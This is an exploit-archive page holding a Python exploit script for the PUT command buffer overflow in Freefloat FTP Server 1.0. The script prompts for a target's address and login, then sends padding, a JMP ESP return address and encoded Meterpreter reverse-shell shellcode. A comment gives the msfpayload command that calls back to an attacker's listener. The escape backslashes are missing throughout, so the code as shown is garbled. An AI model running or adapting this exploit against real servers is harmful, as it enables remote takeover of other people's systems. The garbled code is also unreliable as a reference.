[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Freefloat FTP Server PUT Command Buffer Overflow
# Published : 2012-10-30
# Author :
# Previous Title : ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi
# Next Title : Vice City Multiplayer Server 0.3z R2 Remote Code Execution
#!/usr/bin/python
#########################################################################################################################################
# Title************************Freefloat FTP Server PUT Command Buffer Overflow
# Discovered and Reported******22nd of September, 2012
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://www.freefloat.com/
# CVE for PUT Overflow*********CVE-2012-5106
# Exploit/Advisory*************http://infosec42.blogspot.com/2012/09/freefloatftp-10-put-buffer-overflow.html
# Software*********************Freefloat FTP Server Version 1.0
# Tested Platform**************Windows XP Professional SP2
# Date*************************22/09/2012
#
#Credits for original Buffer Overflow discovery in FreeFloatFTP 1.0 go to
#Veerendra G.G of SecPod Technologies
#For first discovering that FreeFloat FTP had several FTP commands that could cause a Stack Based overflow condition.
#
#In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by
#the FreeFloat FTP existed on the internet just to be assured they knew as SecPod reported their findings last year. They responded and
#acknowledged my discovered vulnerability along with the others in the wild. They also stated the following...
#"In fact we have issued an end of life for the software and it will be taken off-line October 1st."
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
import socket
def Overflow():
print "[!!!!] INSTRUCTIONS:nn[*] Use the commeneted out msfpayload command to generate shellcode for your environment and replace the shellcode variable with your shellcoden[*] Make sure you start a proper listener if using reverse shellnn"
server = raw_input("n[*] Please enter the IP address of a server you wish to exploit:nn>")
port = int(21)
user = raw_input("n[*] Please enter a username for the FTP server:nn>")
password = raw_input("n[*] Please enter a password for username:nn>")
cmd = "put "
nopsled = "x90" * 32
junk = "x90" * 247
junk2 = "x90" * 65
ret_addr = "xEDx1Ex94x7C" #7C941EED - FFE4 - JMP ESP <NTDLL.dll XP sp2> - Dont forget little endian!
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=2107 EXITFUNC=thread R | msfencode -c 1 -e x86/shikata_ga_nai -b "x00x0ax0dx20x7b" R
shellcode = ("xdbxc3xd9x74x24xf4xbdx06xbdx1fxaax5fx33xc9" +
"xb1x49x31x6fx19x83xefxfcx03x6fx15xe4x48xe3" +
"x42x61xb2x1cx93x11x3axf9xa2x03x58x89x97x93" +
"x2axdfx1bx58x7exf4xa8x2cx57xfbx19x9ax81x32" +
"x99x2bx0ex98x59x2axf2xe3x8dx8cxcbx2bxc0xcd" +
"x0cx51x2bx9fxc5x1dx9ex0fx61x63x23x2exa5xef" +
"x1bx48xc0x30xefxe2xcbx60x40x79x83x98xeax25" +
"x34x98x3fx36x08xd3x34x8cxfaxe2x9cxddx03xd5" +
"xe0xb1x3dxd9xecxc8x7axdex0exbfx70x1cxb2xc7" +
"x42x5ex68x42x57xf8xfbxf4xb3xf8x28x62x37xf6" +
"x85xe1x1fx1bx1bx26x14x27x90xc9xfbxa1xe2xed" +
"xdfxeaxb1x8cx46x57x17xb1x99x3fxc8x17xd1xd2" +
"x1dx21xb8xbaxd2x1fx43x3bx7dx28x30x09x22x82" +
"xdex21xabx0cx18x45x86xe8xb6xb8x29x08x9ex7e" +
"x7dx58x88x57xfex33x48x57x2bx93x18xf7x84x53" +
"xc9xb7x74x3bx03x38xaax5bx2cx92xc3xf1xd6x75" +
"x2cxadxd8xf0xc4xafxdaxf2x2fx26x3cx68x40x6e" +
"x96x05xf9x2bx6cxb7x06xe6x08xf7x8dx04xecxb6" +
"x65x61xfex2fx86x3cx5cxf9x99xebxcbx06x0cx17" +
"x5ax50xb8x15xbbx96x67xe6xeexacxaex72x51xdb" +
"xcex92x51x1bx99xf8x51x73x7dx58x02x66x82x75" +
"x36x3bx17x75x6fxefxb0x1dx8dxd6xf7x82x6ex3d" +
"x06xffxb8x78x8cx09xcfx68x4c")
#Fuzz Buffer
#buffer = "PUT " + "x90" * 720
#Exploit Buffer
buffer = cmd + junk + ret_addr + nopsled + shellcode + junk2
print "n[*] Sending payload in attempt to overflow buffern[*] Your payload size is %sn" % len(buffer)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server,port))
data = s.recv(1024)
print "[*] %s" %data
s.send("user " + user + "rn")
data = s.recv(1024)
print "[*] %s" %data
s.send("pass " + password + "rn")
data = s.recv(1024)
print "[*] %s" %data
s.send(buffer+"rn")
s.close()
print "nData was sent. Enjoy your shelln"
except:
print "nn[!!!!] There was an error connecting to the server and sending your buffer[!!!!] Please check the following...nn[*] Supplied IP addressn[*] Username and Passwordn[*] Is your target is online and running FreeFloat FTP servernn"
def main():
print "nn# Title************************Freefloat FTP Server PUT Command Buffer Overflown# Discovered and Reported******22nd of September, 2012n# Discovered/Exploited By******Jacob Holcomb/Gimppy042n# Software Vendor**************http://www.freefloat.com/n# CVE for PUT Overflow*********CVE-2012-510n# Exploit/Advisory*************http://infosec42.blogspot.com/n# Software*********************Freefloat FTP Server Version 1.0n# Tested Platform**************Windows XP Professional SP2n# Date*************************22/09/2012nn"
contin = str(None)
while contin != "yes":
contin = raw_input("n[*] Please review the security advisory before proceeding to affirm this exploit is for your target[*]nWould you like to continue?nn>")
if contin == "no":
break
elif contin == "yes":
break
elif contin != "yes" or "no":
print "nn[*] You responded with %s. Please respond with yes or no!nn"% contin
if contin == "yes":
Overflow()
elif contin == "no":
print "n[!!!!] Hmmm..Guess you downloaded the wrong exploit...Back to scanning and enumeration [!!!!]n"
#Top-level script environment
if __name__ == "__main__":
main()